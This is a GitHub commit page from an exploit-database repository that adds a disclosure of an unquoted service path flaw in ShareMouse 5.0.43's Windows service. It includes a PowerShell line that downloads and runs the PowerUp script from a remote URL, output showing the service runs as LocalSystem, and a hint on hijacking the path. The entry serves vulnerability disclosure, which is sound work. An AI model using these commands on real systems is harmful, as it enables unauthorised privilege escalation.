This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1 changes to exploits/shellcodes ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
- Loading branch information
Offensive Security
committed
Sep 9, 2020
1 parent
f288c52
commit 39b0da4
Showing
2 changed files
with
26 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path | ||
# Discovery Date: 2020-09-08 | ||
# Discovery by: Alan Lacerda (alacerda) | ||
# Vendor Homepage: https://www.sharemouse.com/ | ||
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe | ||
# Version: 5.0.43 | ||
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041 | ||
|
||
PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing); | ||
PS > Invoke-AllChecks | ||
|
||
ServiceName : ShareMouse Service | ||
Path : C:\Program Files (x86)\ShareMouse\smService.exe | ||
StartName : LocalSystem | ||
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath> | ||
|
||
PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName | ||
AcceptStop DisplayName PathName StartName | ||
TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem | ||
|
||
#Exploit: | ||
# A successful attempt would require the local user to be able to insert their code in the system root path | ||
# undetected by the OS or other security applications where it could potentially be executed during | ||
# application startup or reboot. If successful, the local user's code would execute with the elevated | ||
# privileges of the application. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters